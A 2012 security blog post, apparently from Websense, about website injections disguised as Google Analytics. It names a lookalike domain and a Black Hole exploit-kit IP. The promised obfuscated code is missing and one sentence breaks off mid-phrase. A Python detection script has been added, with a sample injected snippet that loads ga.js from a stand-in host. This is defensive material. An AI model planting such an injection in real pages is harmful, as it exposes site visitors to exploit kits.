X-Labs
February 6, 2012

Injection code masquerades as Google Analytics

Tim Xia

The Websense® ThreatSeeker® Network has discovered a new wave of malicious code injection that disguises itself as Google Analytics by using similar code snippets and malicious domains.

 

It is quite convincing at first glance, but remember that the analytics code is usually placed at the bottom of the page rather than at the top, so this is a good hint for webmasters. Another hint is that the attackers use "UA-XXXXX-X", a placeholder, as their "Google Analytics account", which is obviously not what people usually do. We found other similar domains, such as google-analytics[dot]su, in this attack and will update once we find more. The evil ga.js code is as below:


It is highly obfuscated and hard to understand, but after all its tricks it finally redirects to the IP address 37.59.74.145, which hosts Black Hole Exploit
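The hints described above (placeholder account ID, ga.js loaded from a lookalike host, snippet placed at the top of the page) can be turned into a quick audit that a webmaster runs over their own pages. This is an added example, not code from the original post; the `.example` host, the 25% "top of page" cut-off and the hint names are assumptions made for illustration.

```python
import re

PLACEHOLDER_ID = "UA-XXXXX-X"            # placeholder account ID named in the article
GENUINE_DOMAIN = "google-analytics.com"  # domain that serves the real ga.js
TOP_FRACTION = 0.25                      # assumed cut-off for "top of the page"

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
GA_HOST_RE = re.compile(r"([a-z0-9][a-z0-9.-]*)/ga\.js", re.I)

def audit_page(html):
    """Return (hint, detail) tuples for analytics-style <script> blocks."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        text = m.group(1) + " " + m.group(2)  # attributes (src=...) plus inline body
        if "ga.js" not in text and "_gaq" not in text:
            continue                          # not an analytics-style snippet
        if PLACEHOLDER_ID in text:
            findings.append(("placeholder-account", PLACEHOLDER_ID))
        for host in GA_HOST_RE.findall(text):
            host = host.lower()
            if host != GENUINE_DOMAIN and not host.endswith("." + GENUINE_DOMAIN):
                findings.append(("lookalike-host", host))
        # Placement is the weakest of the three hints; treat it as supporting evidence.
        if m.start() / len(html) < TOP_FRACTION:
            findings.append(("near-top", "offset %d" % m.start()))
    return findings

# Constructed sample: an injected snippet at the top of <head>, loading ga.js
# from a made-up lookalike host on the reserved .example TLD.
SAMPLE_INJECTED = """<html><head>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-XXXXX-X']);
_gaq.push(['_trackPageview']);
(function() {
  var ga = document.createElement('script'); ga.async = true;
  ga.src = 'http://www.google-analytics.example/ga.js';
  document.getElementsByTagName('head')[0].appendChild(ga);
})();
</script>
<title>Shop</title></head><body><p>Welcome</p></body></html>"""

if __name__ == "__main__":
    for hint, detail in audit_page(SAMPLE_INJECTED):
        print(hint, detail)
```

A page that carries the genuine snippet near the bottom with a real account ID produces no findings; a "near-top" hint on its own is not enough to call a page compromised.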

  

Websense customers are protected from these threats by ACE, our Advanced Classification Engine.
